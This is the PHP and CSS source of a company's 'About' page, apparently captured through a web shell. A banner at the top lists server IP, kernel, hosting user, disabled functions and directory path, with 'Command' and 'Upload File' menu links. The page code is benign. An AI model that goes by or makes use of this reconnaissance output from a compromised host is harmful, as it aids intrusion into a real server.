|
Server IP : 2a02:4780:2b:1556:0:9c6:43c4:d / Your IP : 216.73.217.162 Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : u163988420 ( 163988420) PHP Version : 8.5.4 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail, proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u163988420/public_html/AACSITE/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php include 'includes/header.php'; ?>
<!-- ====== PAGE HERO ====== -->
<section class="page-hero">
<div class="overlay"></div>
<!-- Animated grid lines -->
<div class="hero-grid-lines">
<?php for ($i = 0; $i < 8; $i++): ?><div class="grid-line"></div><?php endfor; ?>
</div>
<div class="container text-center" style="position:relative;z-index:2">
<div class="hero-eyebrow"><span class="badge-dot"></span><span>ABOUT US</span></div>
<h1>About <span>Windin Solutions</span></h1>
<p>Driving innovation through smart IT solutions and digital transformation.</p>
<div class="hero-breadcrumb">
<a href="index.php">Home</a>
<i class="bi bi-chevron-right"></i>
<span>About</span>
</div>
</div>
</section>
<style>
.page-hero {
position: relative;
padding: 130px 0 100px;
background: linear-gradient(135deg, #020509 0%, #041020 60%, #060d14 100%);
overflow: hidden;
}
.page-hero .overlay {
position: absolute;
inset: 0;
background: radial-gradient(ellipse at 60% 50%, rgba(0, 212, 255, 0.05) 0%, transparent 70%);
}
/* Animated grid lines */
.hero-grid-lines {
position: absolute;
inset: 0;
display: flex;
justify-content: space-around;
pointer-events: none;
}
.grid-line {
width: 1px;
height: 100%;
background: linear-gradient(to bottom, transparent, rgba(0, 212, 255, 0.08), transparent);
animation: grid-pulse 4s ease-in-out infinite;
}
.grid-line:nth-child(odd) {
animation-delay: -2s;
}
@keyframes grid-pulse {
0%,
100% {
opacity: 0.3;
}
50% {
opacity: 1;
}
}
.hero-eyebrow {
display: inline-flex;
align-items: center;
gap: 8px;
background: rgba(0, 212, 255, 0.06);
border: 1px solid rgba(0, 212, 255, 0.25);
border-radius: 30px;
padding: 6px 18px;
margin-bottom: 20px;
font-family: 'Orbitron', monospace;
font-size: 10px;
letter-spacing: 3px;
color: #00d4ff;
}
.badge-dot {
width: 6px;
height: 6px;
background: #00d4ff;
border-radius: 50%;
box-shadow: 0 0 8px #00d4ff;
animation: pulse-dot 2s infinite;
}
@keyframes pulse-dot {
0%,
100% {
opacity: 1;
transform: scale(1)
}
50% {
opacity: .5;
transform: scale(.8)
}
}
.page-hero h1 {
font-family: 'Orbitron', monospace;
font-size: clamp(28px, 5vw, 50px);
font-weight: 800;
color: #e8f4ff;
margin-bottom: 14px;
letter-spacing: 1px;
}
.page-hero h1 span {
color: #00d4ff;
}
.page-hero p {
color: #5a8a9f;
font-size: 16px;
max-width: 500px;
margin: 0 auto 24px;
line-height: 1.7;
}
.hero-breadcrumb {
display: inline-flex;
align-items: center;
gap: 8px;
font-size: 12px;
color: #4a7a9b;
font-family: 'Orbitron', monospace;
letter-spacing: 1px;
}
.hero-breadcrumb a {
color: #00d4ff;
text-decoration: none;
}
.hero-breadcrumb i {
font-size: 10px;
}
.hero-breadcrumb span {
color: #4a7a9b;
}
</style>
<!-- ====== ABOUT SECTION ====== -->
<section class="about-section py-5">
<div class="container">
<div class="row align-items-center g-5">
<!-- Image Side -->
<div class="col-lg-6">
<div class="about-img-wrap">
<div class="img-frame">
<img src="assets/images/cta-bg.png" alt="About Windin Solutions">
<div class="img-scan-line"></div>
</div>
<!-- Corner decorations -->
<div class="img-corner img-tl"></div>
<div class="img-corner img-tr"></div>
<div class="img-corner img-bl"></div>
<div class="img-corner img-br"></div>
<!-- Badge -->
<div class="about-badge-dark">
<span class="ab-num">5+</span>
<span class="ab-label">Years of<br>Excellence</span>
</div>
<!-- Floating tech tag -->
<div class="about-tech-tag">
<i class="bi bi-cpu"></i>
<span>AI-Powered Solutions</span>
</div>
</div>
</div>
<!-- Content Side -->
<div class="col-lg-6">
<h2 class="section-title left">Who <span>We Are</span></h2>
<p class="section-subtitle" style="margin-left:0; margin-bottom:20px">
Windin Solutions Pvt. Ltd. is a forward-thinking IT company delivering innovative
digital solutions for modern businesses.
</p>
<p class="about-desc">
We specialize in website development, software solutions, Salesforce services,
and digital marketing. Our goal is to help businesses grow through scalable
and efficient technology solutions that stand the test of time.
</p>
<div class="about-features-dark mt-4">
<?php
$features = [
["icon" => "bi-people-fill", "title" => "Client Focused", "desc" => "We prioritize client success and long-term satisfaction."],
["icon" => "bi-cpu-fill", "title" => "Modern Tech", "desc" => "Using latest tools, frameworks & technologies."],
["icon" => "bi-graph-up-arrow", "title" => "Scalable Solutions", "desc" => "Built for long-term business growth and performance."],
];
foreach ($features as $f): ?>
<div class="af-item">
<div class="af-icon"><i class="bi <?php echo $f['icon']; ?>"></i></div>
<div>
<h6><?php echo $f['title']; ?></h6>
<p><?php echo $f['desc']; ?></p>
</div>
</div>
<?php endforeach; ?>
</div>
</div>
</div>
</div>
</section>
<style>
.about-section {
position: relative;
padding: 90px 0;
}
/* Image wrap */
.about-img-wrap {
position: relative;
padding: 20px;
}
.img-frame {
position: relative;
border-radius: 12px;
overflow: hidden;
border: 1px solid rgba(0, 212, 255, 0.15);
}
.img-frame img {
width: 100%;
display: block;
filter: brightness(0.75) saturate(0.7);
border-radius: 12px;
transition: 0.5s;
}
.img-frame:hover img {
filter: brightness(0.85) saturate(0.9);
}
/* Scan animation */
.img-scan-line {
position: absolute;
top: -5%;
left: 0;
width: 100%;
height: 3px;
background: linear-gradient(90deg, transparent, rgba(0, 212, 255, 0.6), transparent);
animation: img-scan 4s linear infinite;
pointer-events: none;
}
@keyframes img-scan {
0% {
top: -5%;
opacity: 1;
}
90% {
top: 105%;
opacity: 1;
}
91%,
100% {
top: -5%;
opacity: 0;
}
}
/* Corners */
.img-corner {
position: absolute;
width: 22px;
height: 22px;
border-color: rgba(0, 212, 255, 0.5);
border-style: solid;
}
.img-tl {
top: 6px;
left: 6px;
border-width: 2px 0 0 2px;
}
.img-tr {
top: 6px;
right: 6px;
border-width: 2px 2px 0 0;
}
.img-bl {
bottom: 6px;
left: 6px;
border-width: 0 0 2px 2px;
}
.img-br {
bottom: 6px;
right: 6px;
border-width: 0 2px 2px 0;
}
/* Badge */
.about-badge-dark {
position: absolute;
bottom: 10px;
left: 0px;
background: rgba(6, 18, 32, 0.95);
border: 1px solid rgba(0, 212, 255, 0.3);
border-radius: 12px;
padding: 14px 20px;
display: flex;
align-items: center;
gap: 12px;
backdrop-filter: blur(10px);
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.4), 0 0 20px rgba(0, 212, 255, 0.08);
}
.ab-num {
font-family: 'Orbitron', monospace;
font-size: 28px;
font-weight: 900;
color: #00d4ff;
text-shadow: 0 0 20px rgba(0, 212, 255, 0.5);
line-height: 1;
}
.ab-label {
font-size: 11px;
color: #5a8a9f;
line-height: 1.4;
}
/* Tech tag */
.about-tech-tag {
position: absolute;
top: 10px;
right: 0px;
background: rgba(6, 18, 32, 0.95);
border: 1px solid rgba(0, 212, 255, 0.2);
border-radius: 8px;
padding: 8px 14px;
display: flex;
align-items: center;
gap: 8px;
font-size: 11px;
color: #5a8a9f;
backdrop-filter: blur(10px);
}
.about-tech-tag i {
color: #00d4ff;
font-size: 14px;
}
/* Desc */
.about-desc {
color: #5a8a9f;
font-size: 14px;
line-height: 1.8;
margin-bottom: 10px;
}
/* Features */
.about-features-dark {
display: flex;
flex-direction: column;
gap: 14px;
}
.af-item {
display: flex;
gap: 16px;
align-items: flex-start;
padding: 16px;
background: rgba(0, 212, 255, 0.03);
border: 1px solid rgba(0, 212, 255, 0.08);
border-radius: 10px;
transition: all 0.3s;
}
.af-item:hover {
background: rgba(0, 212, 255, 0.07);
border-color: rgba(0, 212, 255, 0.22);
transform: translateX(6px);
}
.af-icon {
width: 42px;
height: 42px;
flex-shrink: 0;
background: rgba(0, 212, 255, 0.08);
border: 1px solid rgba(0, 212, 255, 0.2);
border-radius: 10px;
display: flex;
align-items: center;
justify-content: center;
}
.af-icon i {
color: #00d4ff;
font-size: 18px;
}
.af-item h6 {
font-family: 'Orbitron', monospace;
font-size: 12px;
font-weight: 600;
letter-spacing: 0.5px;
color: #c8e8ff;
margin-bottom: 4px;
}
.af-item p {
margin: 0;
font-size: 12px;
color: #4a7a9b;
}
</style>
<!-- ====== VISION & MISSION ====== -->
<section class="vm-section py-5">
<div class="container">
<div class="text-center mb-5">
<h2 class="section-title">Our <span>Vision & Mission</span></h2>
<p class="section-subtitle">We are driven by innovation, quality, and long-term success.</p>
</div>
<div class="row g-4">
<div class="col-lg-6">
<div class="vm-card-dark">
<div class="vm-card-header">
<div class="vm-icon-wrap">
<i class="bi bi-eye-fill"></i>
<div class="vm-icon-ring"></div>
</div>
<div class="vm-label">01 / VISION</div>
</div>
<h4>Our Vision</h4>
<p>
To become a trusted global IT partner delivering innovative, scalable, and future-ready solutions
that empower businesses worldwide.
</p>
<div class="vm-line"></div>
<div class="vm-tags">
<span>Innovation</span><span>Scalability</span><span>Global Reach</span>
</div>
</div>
</div>
<div class="col-lg-6">
<div class="vm-card-dark">
<div class="vm-card-header">
<div class="vm-icon-wrap">
<i class="bi bi-bullseye"></i>
<div class="vm-icon-ring"></div>
</div>
<div class="vm-label">02 / MISSION</div>
</div>
<h4>Our Mission</h4>
<p>
To empower businesses with cutting-edge technology, ensuring growth, efficiency, and long-term
success through innovative digital solutions.
</p>
<div class="vm-line"></div>
<div class="vm-tags">
<span>Growth</span><span>Efficiency</span><span>Excellence</span>
</div>
</div>
</div>
</div>
</div>
</section>
<style>
.vm-section {
position: relative;
overflow: hidden;
}
.vm-card-dark {
background: rgba(6, 18, 32, 0.7);
border: 1px solid rgba(0, 212, 255, 0.12);
border-radius: 14px;
padding: 40px 35px;
height: 100%;
transition: all 0.4s;
position: relative;
overflow: hidden;
backdrop-filter: blur(10px);
}
.vm-card-dark::before {
content: "";
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 2px;
background: linear-gradient(90deg, transparent, #00d4ff, transparent);
transform: scaleX(0);
transition: 0.4s;
}
.vm-card-dark:hover {
transform: translateY(-10px);
border-color: rgba(0, 212, 255, 0.3);
box-shadow: 0 20px 50px rgba(0, 0, 0, 0.4), 0 0 25px rgba(0, 212, 255, 0.08);
}
.vm-card-dark:hover::before {
transform: scaleX(1);
}
.vm-card-header {
display: flex;
justify-content: space-between;
align-items: flex-start;
margin-bottom: 20px;
}
.vm-icon-wrap {
width: 65px;
height: 65px;
position: relative;
display: flex;
align-items: center;
justify-content: center;
background: rgba(0, 212, 255, 0.08);
border: 1px solid rgba(0, 212, 255, 0.2);
border-radius: 50%;
flex-shrink: 0;
}
.vm-icon-wrap i {
font-size: 24px;
color: #00d4ff;
position: relative;
z-index: 2;
}
.vm-icon-ring {
position: absolute;
inset: -8px;
border-radius: 50%;
border: 1px dashed rgba(0, 212, 255, 0.2);
animation: ring-spin 10s linear infinite;
}
@keyframes ring-spin {
to {
transform: rotate(360deg);
}
}
.vm-label {
font-family: 'Orbitron', monospace;
font-size: 9px;
letter-spacing: 2px;
color: rgba(0, 212, 255, 0.4);
text-align: right;
}
.vm-card-dark h4 {
font-family: 'Orbitron', monospace;
font-size: 16px;
font-weight: 700;
color: #c8e8ff;
margin-bottom: 12px;
letter-spacing: 1px;
}
.vm-card-dark p {
font-size: 14px;
color: #5a8a9f;
line-height: 1.75;
}
.vm-line {
height: 1px;
background: linear-gradient(90deg, rgba(0, 212, 255, 0.3), transparent);
margin: 22px 0 16px;
}
.vm-tags {
display: flex;
gap: 8px;
flex-wrap: wrap;
}
.vm-tags span {
font-family: 'Orbitron', monospace;
font-size: 9px;
letter-spacing: 1.5px;
color: #00d4ff;
background: rgba(0, 212, 255, 0.07);
border: 1px solid rgba(0, 212, 255, 0.2);
padding: 4px 12px;
border-radius: 20px;
}
</style>
<!-- ====== STATS SECTION ====== -->
<section class="about-stats-dark py-5">
<div class="container">
<div class="row text-center g-4">
<?php
$stats = [
["icon" => "bi-kanban-fill", "num" => 50, "label" => "Projects Completed", "counter" => true],
["icon" => "bi-people-fill", "num" => 30, "label" => "Happy Clients", "counter" => true],
["icon" => "bi-clock-fill", "num" => 5, "label" => "Years Experience", "counter" => true],
["icon" => "bi-headset", "num" => "24/7", "label" => "Support", "counter" => false],
];
foreach ($stats as $s): ?>
<div class="col-lg-3 col-md-6">
<div class="stat-card-dark">
<div class="stat-icon-wrap"><i class="bi <?php echo $s['icon']; ?>"></i></div>
<h3 <?php echo $s['counter'] ? 'class="counter" data-target="' . $s['num'] . '"' : ''; ?>>
<?php echo $s['counter'] ? '0' : $s['num']; ?>
</h3>
<p><?php echo $s['label']; ?></p>
<div class="stat-bar">
<div class="stat-bar-fill"></div>
</div>
</div>
</div>
<?php endforeach; ?>
</div>
</div>
</section>
<style>
.about-stats-dark {
background: linear-gradient(135deg, rgba(0, 212, 255, 0.06) 0%, rgba(0, 100, 255, 0.04) 50%, rgba(0, 212, 255, 0.02) 100%);
border-top: 1px solid rgba(0, 212, 255, 0.08);
border-bottom: 1px solid rgba(0, 212, 255, 0.08);
position: relative;
overflow: hidden;
}
.about-stats-dark::before {
content: "";
position: absolute;
inset: 0;
background: radial-gradient(ellipse at center, rgba(0, 212, 255, 0.04), transparent 70%);
pointer-events: none;
}
.stat-card-dark {
background: rgba(6, 18, 32, 0.6);
border: 1px solid rgba(0, 212, 255, 0.1);
border-radius: 14px;
padding: 35px 20px;
transition: all 0.4s;
position: relative;
overflow: hidden;
backdrop-filter: blur(10px);
}
.stat-card-dark:hover {
transform: translateY(-10px) scale(1.02);
border-color: rgba(0, 212, 255, 0.35);
box-shadow: 0 20px 50px rgba(0, 0, 0, 0.4), 0 0 25px rgba(0, 212, 255, 0.1);
}
.stat-icon-wrap {
width: 56px;
height: 56px;
background: rgba(0, 212, 255, 0.08);
border: 1px solid rgba(0, 212, 255, 0.2);
border-radius: 12px;
display: flex;
align-items: center;
justify-content: center;
margin: 0 auto 15px;
transition: 0.3s;
}
.stat-card-dark:hover .stat-icon-wrap {
background: rgba(0, 212, 255, 0.15);
border-color: #00d4ff;
box-shadow: 0 0 15px rgba(0, 212, 255, 0.2);
}
.stat-icon-wrap i {
font-size: 22px;
color: #00d4ff;
}
.stat-card-dark h3 {
font-family: 'Orbitron', monospace;
font-size: 36px;
font-weight: 800;
color: #00d4ff;
text-shadow: 0 0 25px rgba(0, 212, 255, 0.4);
margin: 0 0 6px;
}
.stat-card-dark p {
font-size: 12px;
color: #4a7a9b;
letter-spacing: 1.5px;
text-transform: uppercase;
margin-bottom: 18px;
}
.stat-bar {
height: 2px;
background: rgba(0, 212, 255, 0.1);
border-radius: 2px;
overflow: hidden;
}
.stat-bar-fill {
height: 100%;
background: linear-gradient(90deg, #00d4ff, rgba(0, 212, 255, 0.2));
width: 0%;
transition: width 1.5s ease;
border-radius: 2px;
}
.stat-card-dark:hover .stat-bar-fill {
width: 100%;
}
</style>
<script>
const counters = document.querySelectorAll('.counter');
counters.forEach(counter => {
const target = +counter.getAttribute('data-target');
let count = 0;
const inc = target / 80;
const timer = setInterval(() => {
count += inc;
if (count >= target) {
counter.innerText = target + "+";
clearInterval(timer);
} else counter.innerText = Math.ceil(count);
}, 20);
});
</script>
<!-- ====== CTA ====== -->
<section class="cta-section-dark my-5 py-5">
<div class="container">
<div class="cta-box-dark text-center">
<div class="cta-corner cta-tl"></div>
<div class="cta-corner cta-tr"></div>
<div class="cta-corner cta-bl"></div>
<div class="cta-corner cta-br"></div>
<div class="cta-badge mb-4"><span class="badge-dot"></span><span>LET'S COLLABORATE</span></div>
<h2>Ready to Grow Your Business?</h2>
<p>Let's work together to build powerful digital solutions that drive real results.</p>
<div class="cta-buttons-dark">
<a href="contact.php" class="btn-primary-tech"><span>Get Free Consultation</span><i class="bi bi-arrow-right"></i></a>
<a href="tel:9999999999" class="btn-ghost-tech"><i class="bi bi-telephone me-2"></i><span>Call Now</span></a>
</div>
</div>
</div>
</section>
<?php include 'includes/footer.php'; ?>